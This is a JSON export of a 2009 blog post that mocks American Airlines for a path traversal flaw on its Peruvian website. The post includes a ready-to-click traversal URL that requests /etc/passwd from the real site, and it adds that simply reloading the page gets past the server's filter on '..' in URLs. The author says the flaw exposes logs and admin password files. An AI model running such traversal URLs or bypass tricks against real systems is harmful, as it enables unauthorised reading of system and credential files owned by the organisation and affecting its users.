{"id":551,"date":"2009-07-17T16:51:30","date_gmt":"2009-07-17T09:51:30","guid":{"rendered":"http:\/\/deepquest.code511.com\/blog\/?p=551"},"modified":"2009-07-17T16:55:06","modified_gmt":"2009-07-17T09:55:06","slug":"fly-american-airlines","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/","title":{"rendered":"Fly American AirLines"},"content":{"rendered":"<p>The world of IT security still amaze me every day, because you always expect the largest companies to be ultra secure with data centers in bunkers, private links between branch offices. But the really is that you always found a dummy admin.<\/p>\n<p>The best example is American Airline (man that&#8217;s a 2 letters domain aa.com!) suffering from major slq injections. Check the following screenshots.<!--more--><\/p>\n<div id='gallery-1' class='gallery galleryid-551 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-12\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-12-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-11\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-11-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-10\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-10-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-9\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-9-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p>That&#8217;s a nasty old school security problem, I think the first ones were around 2000. The transversal bug allow to browse most of the system files: logs, admin password files and more.<\/p>\n<p>The funniest part is that American Airlines have also a firewall and probably a Intrusion Detection System: <a href=\"http:\/\/www.aa.com.pe\/aa\/i18nForward.do?p=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\" target=\"_self\">http:\/\/www.aa.com.pe\/aa\/i18nForward.do?p=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/a><\/p>\n<p>The link will either lead you to the file posted previously or to this one<img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-560\" title=\"Cannot serve URLs with ..'s in them (my ass)\" src=\"http:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-14.png\" alt=\"Cannot serve URLs with ..'s in them (my ass)\" width=\"1074\" height=\"506\" \/>:<\/p>\n<p>Loks very very strong security \u00a0&#8220;Cannot serve URLs with ..&#8217;s in them&#8221;, just reload the page and the target file will show up&#8230;<\/p>\n<p>Amazing world of IT security, everyday we have something new to discover.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>American AirLines let hackers access sensitive files because of an old transversal security bug.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[32,31,29,30],"class_list":["post-551","post","type-post","status-publish","format-standard","hentry","category-security","tag-american-airlines","tag-corporate","tag-disclosure","tag-hack"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-8T","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=551"}],"version-history":[{"count":7,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551\/revisions"}],"predecessor-version":[{"id":563,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551\/revisions\/563"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}